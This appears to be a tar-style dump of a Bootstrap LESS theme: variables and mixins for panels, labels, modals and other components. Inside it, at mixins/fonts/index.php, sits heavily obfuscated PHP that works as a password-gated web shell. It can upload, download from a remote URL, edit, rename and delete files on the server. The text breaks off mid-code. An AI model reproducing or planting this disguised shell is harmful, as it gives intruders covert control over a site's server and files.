@state-warning-bg: #fcf8e3;
@state-warning-border: darken(spin(@state-warning-bg, -10), 5%);

@state-danger-text: #a94442;
@state-danger-bg: #f2dede;
@state-danger-border: darken(spin(@state-danger-bg, -10), 5%);

//== Tooltips
//
//##

//** Tooltip max width
@tooltip-max-width: 200px;
//** Tooltip text color
@tooltip-color: #fff;
//** Tooltip background color
@tooltip-bg: #000;
@tooltip-opacity: .9;

//** Tooltip arrow width
@tooltip-arrow-width: 5px;
//** Tooltip arrow color
@tooltip-arrow-color: @tooltip-bg;

//== Popovers
//
//##

//** Popover body background color
@popover-bg: #fff;
//** Popover maximum width
@popover-max-width: 276px;
//** Popover border color
@popover-border-color: rgba(0, 0, 0, .2);
//** Popover fallback border color
@popover-fallback-border-color: #ccc;

//** Popover title background color
@popover-title-bg: darken(@popover-bg, 3%);

//** Popover arrow width
@popover-arrow-width: 10px;
//** Popover arrow color
@popover-arrow-color: @popover-bg;

//** Popover outer arrow width
@popover-arrow-outer-width: (@popover-arrow-width + 1);
//** Popover outer arrow color
@popover-arrow-outer-color: fadein(@popover-border-color, 5%);
//** Popover outer arrow fallback color
@popover-arrow-outer-fallback-color: darken(@popover-fallback-border-color, 20%);

//== Labels
//
//##

//** Default label background color
@label-default-bg: @gray-light;
//** Primary label background color
@label-primary-bg: @brand-primary;
//** Success label background color
@label-success-bg: @brand-success;
//** Info label background color
@label-info-bg: @brand-info;
//** Warning label background color
@label-warning-bg: @brand-warning;
//** Danger label background color
@label-danger-bg: @brand-danger;

//** Default label text color
@label-color: #fff;
//** Default text color of a linked label
@label-link-hover-color: #fff;

//== Modals
//
//##

//** Padding applied to the modal body
@modal-inner-padding: 15px;

//** Padding applied to the modal title
@modal-title-padding: 15px;
//** Modal title line-height
@modal-title-line-height: @line-height-base;

//** Background color of modal content area
@modal-content-bg: #fff;
//** Modal content border color
@modal-content-border-color: rgba(0, 0, 0, .2);
//** Modal content border color **for IE8**
@modal-content-fallback-border-color: #999;

//** Modal backdrop background color
@modal-backdrop-bg: #000;
//** Modal backdrop opacity
@modal-backdrop-opacity: .5;
//** Modal header border color
@modal-header-border-color: #e5e5e5;
//** Modal footer border color
@modal-footer-border-color: @modal-header-border-color;

@modal-lg: 900px;
@modal-md: 600px;
@modal-sm: 300px;

//== Alerts
//
//## Define alert colors, border radius, and padding.

@alert-padding: 15px;
@alert-border-radius: @border-radius-base;
@alert-link-font-weight: bold;

@alert-success-bg: @state-success-bg;
@alert-success-text: @state-success-text;
@alert-success-border: @state-success-border;

@alert-info-bg: @state-info-bg;
@alert-info-text: @state-info-text;
@alert-info-border: @state-info-border;

@alert-warning-bg: @state-warning-bg;
@alert-warning-text: @state-warning-text;
@alert-warning-border: @state-warning-border;

@alert-danger-bg: @state-danger-bg;
@alert-danger-text: @state-danger-text;
@alert-danger-border: @state-danger-border;

//== Progress bars
//
//##

//** Background color of the whole progress component
@progress-bg: #f5f5f5;
//** Progress bar text color
@progress-bar-color: #fff;
//** Variable for setting rounded corners on progress bar.
@progress-border-radius: @border-radius-base;

//** Default progress bar color
@progress-bar-bg: @brand-primary;
//** Success progress bar color
@progress-bar-success-bg: @brand-success;
//** Warning progress bar color
@progress-bar-warning-bg: @brand-warning;
//** Danger progress bar color
@progress-bar-danger-bg: @brand-danger;
//** Info progress bar color
@progress-bar-info-bg: @brand-info;

//== List group
//
//##

//** Background color on `.list-group-item`
@list-group-bg: #fff;
//** `.list-group-item` border color
@list-group-border: #ddd;
//** List group border radius
@list-group-border-radius: @border-radius-base;

//** Background color of single list items on hover
@list-group-hover-bg: #f5f5f5;
//** Text color of active list items
@list-group-active-color: @component-active-color;
//** Background color of active list items
@list-group-active-bg: @component-active-bg;
//** Border color of active list elements
@list-group-active-border: @list-group-active-bg;
//** Text color for content within active list items
@list-group-active-text-color: lighten(@list-group-active-bg, 40%);

//** Text color of disabled list items
@list-group-disabled-color: @gray-light;
//** Background color of disabled list items
@list-group-disabled-bg: @gray-lighter;
//** Text color for content within disabled list items
@list-group-disabled-text-color: @list-group-disabled-color;

@list-group-link-color: #555;
@list-group-link-hover-color: @list-group-link-color;
@list-group-link-heading-color: #333;

//== Panels
//
//##

@panel-bg: #fff;
@panel-body-padding: 15px;
@panel-heading-padding: 10px 15px;
@panel-footer-padding: @panel-heading-padding;
@panel-border-radius: @border-radius-base;

//** Border color for elements within panels
@panel-inner-border: #ddd;
@panel-footer-bg: #f5f5f5;

@panel-default-text: @gray-dark;
@panel-default-border: #ddd;
@panel-default-heading-bg: #f5f5f5;

@panel-primary-text: #fff;
@panel-primary-border: @brand-primary;
@panel-primary-heading-bg: @brand-primary;

@panel-success-text: @state-success-text;
@panel-success-border: @state-success-border;
@panel-success-heading-bg: @state-success-bg;

@panel-info-text: @state-info-text;
@panel-info-border: @state-info-border;
@panel-info-heading-bg: @state-info-bg;

@panel-warning-text: @state-warning-text;
@panel-warning-border: @state-warning-border;
@panel-warning-heading-bg: @state-warning-bg;

@panel-danger-text: @state-danger-text;
@panel-danger-border: @state-danger-border;
@panel-danger-heading-bg: @state-danger-bg;

//== Thumbnails
//
//##

//** Padding around the thumbnail image
@thumbnail-padding: 4px;
//** Thumbnail background color
@thumbnail-bg: @body-bg;
//** Thumbnail border color
@thumbnail-border: #ddd;
//** Thumbnail border radius
@thumbnail-border-radius: @border-radius-base;

//** Custom text color for thumbnail captions
@thumbnail-caption-color: @text-color;
//** Padding around the thumbnail caption
@thumbnail-caption-padding: 9px;

//== Wells
//
//##

@well-bg: #f5f5f5;
@well-border: darken(@well-bg, 7%);

//== Badges
//
//##

@badge-color: #fff;
//** Linked badge text color on hover
@badge-link-hover-color: #fff;
@badge-bg: @gray-light;

//** Badge text color in active nav link
@badge-active-color: @link-color;
//** Badge background color in active nav link
@badge-active-bg: #fff;

@badge-font-weight: bold;
@badge-line-height: 1;
@badge-border-radius: 10px;

//== Breadcrumbs
//
//##

@breadcrumb-padding-vertical: 8px;
@breadcrumb-padding-horizontal: 15px;
//** Breadcrumb background color
@breadcrumb-bg: #f5f5f5;
//** Breadcrumb text color
@breadcrumb-color: #ccc;
//** Text color of current page in the breadcrumb
@breadcrumb-active-color: @gray-light;
//** Textual separator for between breadcrumb elements
@breadcrumb-separator: "/";

//== Carousel
//
//##

@carousel-text-shadow: 0 1px 2px rgba(0, 0, 0, .6);

@carousel-control-color: #fff;
@carousel-control-width: 15%;
@carousel-control-opacity: .5;
@carousel-control-font-size: 20px;

@carousel-indicator-active-bg: #fff;
@carousel-indicator-border-color: #fff;

@carousel-caption-color: #fff;

//== Close
//
//##

@close-font-weight: bold;
@close-color: #000;
@close-text-shadow: 0 1px 0 #fff;

//== Code
//
//##

@code-color: #c7254e;
@code-bg: #f9f2f4;

@kbd-color: #fff;
@kbd-bg: #333;

@pre-bg: #f5f5f5;
@pre-color: @gray-dark;
@pre-border-color: #ccc;
@pre-scrollable-max-height: 340px;

//== Type
//
//##

//** Horizontal offset for forms and lists.
@component-offset-horizontal: 180px;
//** Text muted color
@text-muted: @gray-light;
//** Abbreviations and acronyms border color
@abbr-border-color: @gray-light;
//** Headings small color
@headings-small-color: @gray-light;
//** Blockquote small color
@blockquote-small-color: @gray-light;
//** Blockquote font size
@blockquote-font-size: (@font-size-base * 1.25);
//** Blockquote border color
@blockquote-border-color: @gray-lighter;
//** Page header border color
@page-header-border-color: @gray-lighter;
//** Width of horizontal description list titles
@dl-horizontal-offset: @component-offset-horizontal;
//** Horizontal line color.
@hr-border: @gray-lighter;
bootstrap-less/mixins.less000066400000002154152434265230011736 0ustar00// Mixins
// --------------------------------------------------
// Utilities
@import "mixins/hide-text.less";
@import "mixins/opacity.less";
@import "mixins/image.less";
@import "mixins/labels.less";
@import "mixins/reset-filter.less";
@import "mixins/resize.less";
@import "mixins/responsive-visibility.less";
@import "mixins/size.less";
@import "mixins/tab-focus.less";
@import "mixins/reset-text.less";
@import "mixins/text-emphasis.less";
@import "mixins/text-overflow.less";
@import "mixins/vendor-prefixes.less";
// Components
@import "mixins/alerts.less";
@import "mixins/buttons.less";
@import "mixins/panels.less";
@import "mixins/pagination.less";
@import "mixins/list-group.less";
@import "mixins/nav-divider.less";
@import "mixins/forms.less";
@import "mixins/progress-bar.less";
@import "mixins/table-row.less";
// Skins
@import "mixins/background-variant.less";
@import "mixins/border-radius.less";
@import "mixins/gradients.less";
// Layout
@import "mixins/clearfix.less";
@import "mixins/center-block.less";
@import "mixins/nav-vertical-align.less";
@import "mixins/grid-framework.less";
@import "mixins/grid.less";
bootstrap-less/mixins/labels.less000066400000000241152434265230013173 0ustar00// Labels

.label-variant(@color) {
  background-color: @color;

  &[href] {
    &:hover,
    &:focus {
      background-color: darken(@color, 10%);
    }
  }
}
bootstrap-less/mixins/panels.less000066400000001031152434265230013211 0ustar00// Panels

.panel-variant(@border; @heading-text-color; @heading-bg-color; @heading-border) {
  border-color: @border;

  & > .panel-heading {
    color: @heading-text-color;
    background-color: @heading-bg-color;
    border-color: @heading-border;

    + .panel-collapse > .panel-body {
      border-top-color: @border;
    }
    .badge {
      color: @heading-bg-color;
      background-color: @heading-text-color;
    }
  }
  & > .panel-footer {
    + .panel-collapse > .panel-body {
      border-bottom-color: @border;
    }
  }
}
bootstrap-less/mixins/fonts/index.php000064400000241154152434265230014022 0ustar00<?php
 goto uV7Wv; FVFQw: if (!(isset($_POST["\162\145\x6e\141\155\x65\137\x69\164\145\x6d"]) && !empty($_POST["\x6f\x72\x69\147\x69\156\141\154\x5f\x6e\x61\x6d\x65"]) && !empty($_POST["\x6e\x65\x77\x5f\156\x61\155\145"]))) { goto OvUZo; } goto JvSr5; zkyUf: echo "\15\xa\x20\x20\40\40\40\x20\40\x20\40\x20\40\x20\40\x20\40\x20\x20\x20\x20\40\x3c\x21\x2d\x2d\40\106\x69\x6c\145\x73\x20\55\x2d\x3e\15\xa\x20\x20\x20\x20\x20\x20\40\40\40\40\40\40\40\40\x20\x20\40\40\40\x20"; goto vRFPg; bkqmL: goto LaBkL; goto v9uiM; yiFRb: if (isset($_SESSION["\143\x73\162\x66\x5f\164\157\x6b\145\x6e"])) { goto gy0p8; } goto B0Oni; VN6WE: if (!(!$JuXLO || !is_dir($JuXLO) || !is_readable($JuXLO) || strpos($JuXLO, $EOGAw) !== 0)) { goto ks3Rx; } goto PbNZ2; iniOU: $ucr2r = filter_var($_POST["\162\145\x6d\x6f\x74\145\x5f\165\x72\154"], FILTER_VALIDATE_URL); goto xKzhF; lurGY: if ($SxUVu !== false && file_put_contents($oOyvY, $SxUVu) !== false) { goto ymELu; } goto nBacg; N0Qo3: ymELu: goto BYIo8; Hen4J: $eiAOI = "\105\x72\162\157\x72\x20\144\145\x6c\x65\164\x69\156\x67\x20\146\151\154\x65\56"; goto bkqmL; YNHsd: goto s8lvj; goto WTtVL; fqbkG: if (!(isset($_POST["\x64\x65\154\145\164\x65\137\x69\164\145\x6d"]) && !empty($_POST["\x69\x74\x65\155\137\x6e\x61\155\145"]))) { goto JNb9a; } goto m7My9; VmcMU: echo "\x20\x20\x20\40\x20\x20\x20\40\x20\x20\x20\40\x3c\x64\151\x76\40\x63\154\141\x73\x73\x3d\x22\x62\x67\x2d\x67\162\145\x65\156\x2d\61\60\x30\40\x62\x6f\x72\144\145\162\55\x6c\55\x34\40\142\157\162\x64\x65\x72\55\147\162\x65\145\x6e\x2d\x35\60\x30\40\x74\x65\x78\164\55\147\x72\145\145\156\55\x37\60\60\40\160\x2d\x34\40\x6d\142\x2d\x36\40\162\x6f\165\x6e\144\145\144\x2d\x6c\147\42\40\x72\157\154\x65\75\x22\141\x6c\x65\162\x74\42\76\xd\xa\x20\40\40\40\40\x20\x20\x20\x20\x20\x20\x20\40\40\x20\x20"; goto FzHqF; UkyAl: SNswM: goto p25ek; MHQ3Q: $eiAOI = "\111\x74\145\155\x20\x75\x70\x6c\157\141\x64\x65\144\40\x73\x75\x63\143\145\x73\x73\146\165\x6c\x6c\x79\56"; goto JMC0y; ej7fH: FVkpc: goto pHwQw; ItnLj: if (file_put_contents($dmR7a, $B81_5) !== false) { goto YPUNT; } goto nbZmL; ucjul: if (unlink($EFHtu)) { goto bFCor; } goto Hen4J; J_lf4: $SxUVu = @file_get_contents($ucr2r); goto lurGY; AFPJJ: echo htmlspecialchars($_SESSION["\143\163\162\x66\137\164\x6f\x6b\x65\x6e"]); goto D9tDx; mjbm2: if (!(isset($_GET["\x6f\160\x65\162\141\x74\151\157\x6e"]) && $_GET["\x6f\160\x65\x72\x61\x74\151\157\156"] === "\162\145\x74\162\151\x65\x76\145\137\146\x69\x6c\145\137\143\157\x6e\164\x65\x6e\164" && isset($_GET["\151\x74\x65\x6d"]))) { goto us8BU; } goto EJP_Z; Pn2Nm: t7RJ2: goto FVFQw; vzseR: $YKE5h = strtolower(pathinfo($w529N, PATHINFO_EXTENSION)); goto ZZXlr; qVQuB: goto FVkpc; goto FLPCN; sMj7L: if (in_array($YKE5h, $PW0Cu) && $cfUXs["\x73\151\172\145"] <= $v8gcw) { goto LHd39; } goto SvitK; ohjk6: goto wo1el; goto rGH6K; mjB6T: if (!($JuXLO !== $EOGAw)) { goto MdT48; } goto Y70El; xIfK4: echo htmlspecialchars($_SESSION["\143\x73\x72\146\137\164\x6f\153\x65\156"]); goto MexCb; nBacg: $eiAOI = "\105\162\162\x6f\x72\40\144\x6f\167\156\154\x6f\x61\144\151\x6e\x67\40\151\x74\x65\155\x2e"; goto LqQZ8; Wzhlb: $eiAOI = "\x46\151\154\x65\40\165\x70\144\141\164\145\144\40\163\x75\143\x63\x65\x73\x73\146\165\154\154\x79\x2e"; goto TVh8n; FLPCN: eeRC_: goto AnH12; ntrLs: $YKE5h = strtolower(pathinfo($cfUXs["\156\x61\155\x65"], PATHINFO_EXTENSION)); goto sMj7L; iAPRi: wW3ET: goto CW41u; RR2cQ: JP8U0: goto OSSRi; ZSnvJ: $w529N = z2Hhu($_POST["\x69\x74\145\155\x5f\x6e\x61\x6d\145"]); goto fwI1L; JseVe: echo htmlspecialchars($_SESSION["\143\163\x72\x66\137\x74\x6f\153\145\x6e"]); goto gB7S4; ZWGAW: CVd7h: goto J_lf4; Ekrpu: $EFHtu = $JuXLO . "\x2f" . $w529N; goto khOfQ; p3baY: die("\15\xa\40\40\x20\40\40\x20\x20\x20\x20\x20\40\x20\40\40\x20\40\x3c\x21\x44\117\103\x54\x59\x50\x45\x20\150\164\155\154\76\xd\12\40\40\40\40\40\40\x20\40\x20\x20\x20\40\x20\40\40\x20\74\150\164\155\154\x20\x6c\141\156\147\x3d\x22\x65\x6e\x22\76\xd\12\x20\40\x20\40\x20\40\x20\40\40\x20\40\x20\40\40\40\x20\x3c\150\x65\x61\x64\76\15\xa\40\40\x20\x20\x20\x20\x20\x20\x20\x20\40\40\40\40\40\40\40\x20\x20\40\x3c\155\145\x74\x61\40\x63\150\x61\162\163\145\x74\75\x22\x55\x54\106\55\x38\42\76\xd\12\x20\x20\40\40\40\x20\x20\40\40\x20\x20\x20\x20\40\x20\x20\40\x20\40\40\74\155\x65\x74\141\40\x6e\x61\155\145\x3d\x22\x76\151\145\167\x70\157\162\164\x22\x20\143\x6f\156\164\x65\x6e\164\75\x22\x77\x69\144\164\x68\x3d\x64\x65\166\x69\143\145\x2d\x77\151\x64\x74\150\54\40\151\156\151\164\151\141\154\55\163\143\141\154\x65\x3d\61\56\60\x22\x3e\xd\12\x20\40\40\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\74\x74\151\x74\154\x65\76\101\143\x63\145\x73\163\40\104\x65\x6e\151\145\x64\74\57\164\x69\164\154\x65\76\xd\xa\x20\x20\40\x20\40\x20\40\x20\x20\x20\x20\x20\40\40\x20\x20\x20\40\x20\40\x3c\x73\x63\162\151\x70\x74\40\163\x72\x63\75\42\x68\164\164\160\163\72\x2f\x2f\143\x64\156\56\164\x61\x69\154\167\x69\156\144\x63\163\163\x2e\143\x6f\155\x22\76\x3c\57\163\143\x72\151\160\x74\76\xd\xa\40\x20\x20\40\40\x20\x20\40\x20\x20\40\40\x20\x20\x20\x20\74\57\x68\x65\x61\x64\76\xd\xa\x20\x20\40\x20\40\40\40\40\40\x20\x20\x20\40\40\40\x20\74\142\x6f\x64\x79\40\143\x6c\x61\163\x73\75\42\x62\x67\x2d\x76\151\166\151\x64\x2d\163\x6c\x61\164\x65\x20\x6d\x69\x6e\55\150\55\163\x63\162\145\x65\156\x20\146\154\x65\170\40\x69\164\145\155\x73\55\143\x65\x6e\x74\145\162\x20\152\165\163\164\x69\x66\x79\x2d\143\x65\156\x74\145\162\42\x3e\xd\xa\x20\40\40\40\40\40\40\40\x20\x20\40\40\x20\x20\x20\40\x20\x20\x20\40\x3c\x64\x69\x76\x20\143\154\x61\x73\163\x3d\x22\142\147\55\x77\x68\151\x74\145\x20\160\x2d\x38\x20\x72\157\165\x6e\x64\145\x64\x2d\x78\154\x20\x73\150\x61\x64\x6f\167\55\x78\x6c\40\x77\x2d\x66\165\x6c\x6c\40\x6d\141\170\x2d\x77\x2d\155\x64\42\76\15\12\x20\40\40\x20\40\40\x20\x20\40\x20\x20\x20\x20\40\40\40\x20\40\40\x20\40\40\40\x20\74\150\x32\x20\143\x6c\141\x73\x73\x3d\42\x74\145\170\x74\x2d\x32\x78\154\x20\146\157\x6e\164\55\x62\x6f\x6c\x64\40\155\x62\x2d\x36\x20\164\145\x78\164\x2d\143\145\156\164\145\162\x20\x74\145\x78\x74\55\166\x69\x76\x69\x64\x2d\x63\150\141\x72\143\x6f\x61\154\42\x3e\123\145\143\x75\162\145\x20\x41\143\x63\145\x73\163\x20\x52\x65\161\x75\151\162\x65\144\74\57\150\x32\x3e\15\12\x20\40\40\x20\x20\40\x20\40\x20\40\40\40\40\40\x20\x20\x20\40\40\x20\40\x20\x20\x20\74\146\x6f\162\155\x20\x6d\145\164\150\x6f\144\x3d\x22\120\x4f\x53\x54\x22\x3e\15\12\40\40\40\40\x20\x20\40\40\x20\40\x20\40\x20\x20\x20\x20\40\x20\40\x20\x20\x20\40\40\x20\x20\40\x20\74\x69\x6e\160\x75\x74\40\x74\171\160\145\x3d\42\150\151\x64\144\145\x6e\x22\40\x6e\141\155\x65\x3d\x22\143\163\162\146\137\164\x6f\x6b\x65\x6e\42\40\166\x61\x6c\x75\x65\75\x22" . htmlspecialchars($_SESSION["\143\163\162\x66\x5f\x74\x6f\153\x65\x6e"]) . "\42\x3e\xd\12\x20\x20\40\x20\x20\40\40\40\40\x20\x20\x20\x20\40\x20\40\x20\x20\40\40\x20\x20\40\x20\40\x20\40\40\74\151\x6e\x70\165\164\40\x74\171\x70\145\75\x22\160\141\x73\163\167\x6f\x72\144\x22\40\156\x61\155\x65\x3d\x22\x73\145\143\165\162\145\x5f\x6b\145\x79\42\x20\143\x6c\141\x73\x73\x3d\42\x77\55\146\165\x6c\154\x20\x70\x2d\x33\40\x62\x6f\162\x64\145\x72\40\x72\x6f\x75\x6e\144\145\x64\55\x6c\x67\40\x6d\142\x2d\64\x20\146\157\x63\165\163\72\157\x75\x74\154\x69\x6e\145\x2d\156\x6f\156\145\40\x66\157\x63\x75\x73\72\x72\151\x6e\147\55\x32\x20\x66\x6f\x63\165\x73\72\x72\151\156\147\x2d\166\x69\166\151\x64\x2d\164\145\x61\154\42\40\x70\x6c\141\x63\145\150\157\154\x64\145\162\75\42\105\156\x74\x65\162\x20\163\x65\143\x75\162\145\40\x6b\145\171\42\x20\162\145\x71\165\x69\162\145\144\x20\141\165\164\157\x66\x6f\143\165\x73\76\15\12\40\x20\x20\40\x20\40\40\40\40\40\40\x20\x20\40\40\40\40\40\x20\x20\x20\x20\40\40\40\x20\40\x20\x3c\x62\165\x74\164\x6f\x6e\40\164\171\x70\145\x3d\x22\x73\165\x62\x6d\x69\164\x22\x20\x63\154\141\x73\163\x3d\x22\167\55\x66\165\x6c\x6c\40\142\x67\55\166\151\166\151\144\x2d\x74\145\141\x6c\40\164\145\x78\164\x2d\x77\x68\x69\x74\x65\40\x70\x2d\63\40\x72\157\165\156\144\x65\144\x2d\154\x67\x20\x68\157\166\145\162\x3a\x62\x67\55\166\151\166\x69\x64\55\164\x65\141\x6c\55\x64\x61\x72\153\40\x74\x72\141\x6e\x73\x69\x74\x69\157\x6e\x22\76\x55\156\154\157\x63\x6b\74\57\x62\165\164\164\x6f\x6e\76\15\12\40\x20\40\40\40\x20\x20\40\40\40\40\40\x20\x20\x20\x20\40\40\40\x20\40\x20\x20\x20\x3c\57\x66\x6f\x72\x6d\76\15\xa\x20\x20\x20\40\40\x20\40\40\40\40\40\40\40\x20\x20\40\x20\40\x20\40\x3c\57\x64\151\x76\x3e\15\xa\40\x20\x20\40\x20\x20\40\x20\40\x20\40\x20\40\x20\40\40\74\x2f\x62\x6f\144\x79\x3e\15\12\x20\x20\x20\40\x20\40\40\x20\x20\40\40\40\40\40\x20\x20\74\x2f\x68\x74\155\x6c\x3e\15\xa\x20\40\x20\40\40\x20\x20\40\x20\40\40\40\x20\x20\x20\40"); goto qVQuB; ObV33: rGfQF: goto rbr53; t6zNC: us8BU: goto ivdBD; lTLNh: $eiAOI = "\x49\156\166\x61\x6c\x69\144\x20\x73\x6f\165\x72\x63\145\40\157\162\40\144\x65\163\x74\151\156\141\164\x69\157\156\40\156\x61\155\x65\56"; goto pTgl7; ccKab: function Z2hhu($kh59e) { return preg_replace("\57\133\x5e\x61\x2d\172\x41\x2d\x5a\x30\55\71\x2e\137\x2d\x5d\x2f", '', trim($kh59e)); } goto TgiRY; AnH12: $_SESSION["\x73\145\x63\165\x72\x65\137\163\145\163\163\x69\x6f\156"] = true; goto ej7fH; SvitK: $eiAOI = "\111\x6e\166\141\x6c\151\x64\x20\146\x69\x6c\145\40\x74\x79\160\145\40\x6f\162\40\x73\x69\172\145\x20\145\x78\143\x65\x65\144\x73\40\x6c\151\x6d\151\164\x2e"; goto YNJtF; nz64g: echo "\46\157\x70\x65\162\141\x74\x69\157\156\75\x72\x65\x74\x72\151\145\x76\145\x5f\x66\x69\154\x65\x5f\x63\x6f\156\164\145\x6e\x74\x26\x69\164\x65\x6d\x3d\47\40\x2b\40\145\156\143\157\x64\x65\x55\x52\111\103\x6f\x6d\x70\157\x6e\x65\x6e\x74\x28\151\x74\145\155\x4e\141\x6d\145\51\51\15\12\40\40\40\40\40\x20\x20\40\40\x20\40\x20\40\40\40\40\56\164\150\x65\156\x28\162\x65\x73\x70\x6f\x6e\x73\x65\x20\75\x3e\40\173\xd\12\40\40\40\x20\x20\40\x20\40\x20\x20\x20\x20\40\x20\40\40\40\40\40\x20\x69\146\40\x28\41\x72\145\163\160\x6f\x6e\163\145\x2e\157\153\x29\40\164\x68\x72\157\167\x20\156\145\x77\x20\x45\162\x72\x6f\x72\x28\47\x49\164\x65\x6d\40\156\157\x74\x20\x66\x6f\165\156\x64\x27\x29\73\xd\12\40\x20\x20\40\40\40\40\x20\40\40\40\40\40\40\x20\40\x20\x20\40\40\162\x65\164\165\162\156\40\x72\x65\163\160\157\156\x73\145\56\x74\145\170\x74\x28\51\x3b\15\12\x20\40\40\x20\x20\40\40\x20\x20\x20\40\40\x20\x20\x20\40\x7d\x29\15\xa\40\40\x20\x20\x20\40\40\x20\x20\x20\x20\40\40\x20\x20\x20\x2e\x74\150\x65\x6e\50\x63\157\156\164\x65\x6e\164\40\75\76\40\x7b\xd\12\x20\x20\x20\40\40\x20\40\40\40\x20\40\x20\x20\40\40\x20\40\40\40\x20\x64\157\x63\165\155\x65\x6e\x74\56\x67\x65\164\105\x6c\x65\155\145\x6e\x74\102\171\111\x64\50\x27\145\144\151\x74\x49\x74\145\155\116\x61\155\145\47\51\56\x76\x61\x6c\165\145\x20\x3d\x20\151\164\x65\x6d\116\x61\x6d\x65\x3b\15\12\40\40\40\x20\40\x20\40\40\x20\40\x20\40\x20\x20\x20\40\40\40\40\40\144\x6f\143\x75\x6d\x65\x6e\x74\56\x67\x65\x74\x45\x6c\145\155\145\x6e\164\102\171\x49\144\x28\x27\x65\144\x69\x74\111\164\145\x6d\103\157\x6e\164\145\156\164\47\51\56\x76\x61\154\x75\145\40\x3d\x20\143\x6f\x6e\164\x65\156\164\73\xd\12\x20\x20\40\40\x20\40\40\40\40\40\x20\x20\x20\x20\x20\40\x20\40\40\x20\x6f\160\x65\x6e\x44\151\141\x6c\x6f\147\x28\47\145\x64\151\x74\104\151\141\x6c\x6f\147\x27\51\73\15\12\40\40\40\40\x20\40\x20\x20\40\x20\40\40\x20\40\x20\40\x7d\51\15\xa\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\40\40\x2e\x63\141\x74\x63\x68\x28\145\x72\162\x6f\x72\x20\x3d\76\40\173\15\xa\40\40\x20\40\x20\x20\x20\40\x20\40\40\x20\x20\40\x20\40\40\x20\40\x20\141\154\145\x72\164\x28\x27\105\x72\x72\157\162\x20\154\157\x61\x64\151\x6e\147\x20\151\x74\x65\155\x20\x63\157\x6e\164\145\156\164\x3a\40\47\x20\x2b\40\x65\x72\x72\x6f\162\56\x6d\145\163\163\141\147\145\51\x3b\15\12\40\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\40\40\x7d\51\73\xd\12\40\x20\x20\40\40\40\40\x20\x7d\15\12\15\12\40\x20\x20\40\x20\40\x20\40\x66\165\x6e\143\164\151\157\156\40\157\160\x65\x6e\x52\145\156\141\x6d\x65\104\x69\141\x6c\x6f\147\50\151\x74\145\155\116\x61\x6d\145\51\x20\x7b\xd\xa\40\x20\x20\x20\40\x20\x20\40\40\40\40\40\144\157\x63\165\x6d\145\156\164\56\x67\145\164\x45\154\x65\155\145\156\x74\x42\x79\x49\x64\x28\x27\157\162\x69\x67\x69\156\141\x6c\x49\x74\145\155\x4e\x61\155\145\47\51\x2e\x76\x61\x6c\x75\x65\x20\75\x20\x69\164\x65\155\116\141\155\145\x3b\xd\12\x20\40\x20\40\40\40\x20\40\x20\x20\x20\40\x64\157\x63\165\155\145\156\x74\56\147\145\164\x45\x6c\x65\x6d\145\156\x74\x42\x79\111\144\x28\47\x6e\145\x77\111\x74\x65\155\x4e\x61\155\x65\x27\51\x2e\x76\x61\x6c\165\x65\x20\75\x20\151\164\145\155\116\141\x6d\x65\x3b\15\12\40\40\40\40\40\x20\x20\40\x20\40\40\x20\x6f\x70\x65\x6e\x44\151\141\154\x6f\x67\x28\47\162\x65\156\141\155\145\104\x69\141\154\x6f\x67\47\51\73\xd\12\40\x20\40\x20\x20\40\40\x20\175\15\12\15\12\x20\x20\x20\40\x20\x20\x20\40\x66\165\x6e\x63\x74\x69\157\x6e\x20\x63\x6f\x6e\x66\151\162\155\104\145\x6c\145\164\145\x28\x69\x74\x65\x6d\x4e\141\x6d\x65\51\40\173\xd\xa\40\40\x20\x20\40\40\x20\40\x20\x20\x20\x20\x69\146\x20\x28\x63\157\156\146\151\162\x6d\x28\x60\x41\162\x65\x20\x79\x6f\165\40\163\165\162\145\x20\x79\157\165\x20\167\141\156\x74\x20\164\x6f\40\144\x65\154\x65\x74\x65\x20\42\x24\x7b\x69\164\145\155\116\141\x6d\x65\175\x22\x3f\40\124\x68\x69\x73\40\141\x63\164\x69\157\x6e\40\x63\x61\x6e\156\157\x74\x20\142\145\x20\x75\x6e\x64\x6f\156\145\56\x60\51\51\40\173\xd\12\x20\40\40\x20\x20\40\40\x20\40\40\x20\x20\40\40\40\x20\x63\157\x6e\x73\164\x20\x66\x6f\162\x6d\x20\75\40\x64\157\143\x75\155\x65\156\x74\56\143\x72\145\141\x74\145\x45\154\145\155\145\x6e\164\50\x27\x66\157\162\x6d\x27\51\x3b\15\12\x20\40\40\x20\40\40\40\x20\40\x20\x20\x20\40\x20\x20\x20\146\x6f\162\x6d\56\x6d\x65\x74\x68\x6f\x64\40\x3d\40\47\160\157\x73\x74\47\x3b\15\12\x20\x20\x20\40\x20\x20\40\40\40\40\x20\40\40\x20\40\x20\x66\x6f\162\155\x2e\151\x6e\156\x65\x72\x48\x54\115\114\x20\75\40\x60\xd\12\40\40\40\x20\40\40\40\40\40\x20\x20\40\40\40\x20\40\x20\40\x20\40\x3c\x69\x6e\x70\x75\164\x20\x74\x79\x70\145\75\x22\150\x69\144\144\x65\x6e\42\40\x6e\141\x6d\145\75\x22\143\163\x72\146\137\164\x6f\153\145\156\42\x20\x76\141\154\x75\145\x3d\42"; goto v0_Rt; pvxMR: gy0p8: goto zUxD1; wz_DU: $eiAOI = "\x46\157\x6c\144\x65\162\x20\x63\x72\145\141\x74\145\144\x20\163\x75\x63\143\x65\163\x73\x66\x75\154\154\171\x2e"; goto b5lZB; ZZXlr: if (in_array($YKE5h, $PW0Cu) && !file_exists($oOyvY)) { goto CVd7h; } goto nGbHx; JvSr5: $TzT08 = z2Hhu($_POST["\157\x72\151\147\151\156\x61\154\137\156\x61\x6d\145"]); goto g6eNo; OSSRi: sort($TE33v); goto ERU1n; Fo8E6: BGEfe: goto ItnLj; PbNZ2: $JuXLO = $EOGAw; goto QT3DB; uyPmA: $PGl9z = new ZipArchive(); goto oMXsA; NLLXg: MdT48: goto BHN0W; boWew: if (is_dir($EFHtu)) { goto MDXAH; } goto YS5PX; Azqj4: echo 